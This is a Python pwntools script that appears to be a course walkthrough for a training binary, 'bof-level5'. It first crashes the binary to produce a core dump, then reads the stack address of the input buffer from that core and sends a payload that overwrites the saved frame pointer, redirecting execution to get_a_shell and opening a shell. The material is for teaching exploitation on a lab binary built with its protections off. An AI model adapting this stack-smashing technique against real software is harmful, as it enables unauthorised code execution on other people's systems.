#!/usr/bin/env python
"""Walkthrough script for the bof-level5 training binary.

The binary is run twice.  The first run is fed an over-long input so that
the process crashes and leaves a core dump; the core is then searched for
the input bytes to learn where the buffer lives on the stack.  The second
run is fed a payload built from that stack address and the address of the
`get_a_shell` symbol read out of the ELF.

The technique only makes sense on a binary built without the usual
mitigations: a stack canary would abort before the saved ebp is clobbered,
and PIE/ASLR would randomise both addresses used below.  Presumably they
are disabled for this exercise -- confirm with `pwn checksec ./bof-level5`.
"""
import subprocess
# pwntools' star-import also re-exports os/sys and provides process, context,
# gdb, ELF, Core and p32 used below.
from pwn import *

# you may attach gdb with this program (bof-levelx)
p = process('./bof-level5')

# a setup for automatically opening gdb pane if you are using `tmux`
context.terminal = ['tmux', 'splitw', '-h']

# this will spawn gdb for you (remove this if you do not want gdb)
gdb.attach(p)

# Please check the binary; read disassembly output from gdb
#
# buffer is at -0x80(%ebp)
# [ buffer size - 0x80 ] [ saved ebp ]
#      'A' * 0x80           'dddd'
# [ 'AAAA' + 'addr of get_a_shell' + 'A' * (0x80-8) ]

# Manual method (addresses read off by hand in gdb; kept for reference).
# Note that the last line mixes a str ('A' * ...) with bytes and would not
# run as written on Python 3.
# Target_ebp_value = p32(0xffffd3e8)
# addr_of_get_a_shell = p32(0x80484cb)
# buf = b'A' * 0x80 + target_ebp_value
# buf = b'AAAA' + addr_of_get_a_shell + 'A' * (0x80 - 8) + target_ebp_value

# A more automatic method
# this will open an ELF object,
e = ELF('./bof-level5')
# and you can find the address of a symbol as follows.
get_a_shell = e.symbols['get_a_shell']
print(hex(get_a_shell))

# First payload: fill the 0x80-byte buffer and overwrite the saved ebp slot
# (see the layout sketch above) with 0.  The process is expected to crash
# on this input, which is what produces the core dump read back below.
buf = b"A" * 0x80 + p32(0)

# for generating core
# if not os.path.exists('core'):
p.sendline(buf)
# block until the first run has died (and the core has been written)
p.wait()

# NOTE(review): `ls -r` sorts in reverse lexical order, not by mtime, so with
# several core.* files already in the directory this is not guaranteed to
# pick the one just produced; remove stale cores before re-running.
core = subprocess.getoutput("ls -r core* |head -1").strip()
if not core:
    print("Failed to generate core.")
    sys.exit(255)

"""
In case if you can't get core, then please check your directory.
Core will be generated only if you are under /home/users/* directories
(your home directory). The core should be in the format of
`core.1001.16079.1612625837`.

To work on challenges in your home directory (and also writing some
scripts), please use the commend 'fetch' to get all challenges linked in
your directory. e.g.,

  $ fetch unit2

this command will fetch all challenges under the directory name 'unit2'.

In the worst case (if you still cannot get the core), try the following
command in bash:

  $ ulimit -c unlimited
"""

c = Core(core)
# we may find the address of buffer from the 'core':
# the stack image is searched for the exact bytes sent in the first run,
# so the offset returned is the address at which the buffer was located.
buffer_addr = c.stack.find(buf)
print("begining of the stack:", hex(buffer_addr))

# construct a new buffer that overwrites saved ebp and then returns to
# get_a_shell().  Layout follows the sketch above: 4 bytes of padding, the
# address of get_a_shell, filler up to the saved-ebp slot, and finally the
# buffer's own stack address (from the core) written over the saved ebp.
buf = b"AAAA" + p32(get_a_shell) + b"A" * (0x80 - 8) + p32(buffer_addr)

# Second run: fresh process, same binary.  The stack address recovered from
# the core is only valid if this run gets the same stack layout as the
# first (i.e. no ASLR) -- another reason the exercise needs mitigations off.
p = process('./bof-level5')
p.sendline(buf)

# enjoy!
p.interactive()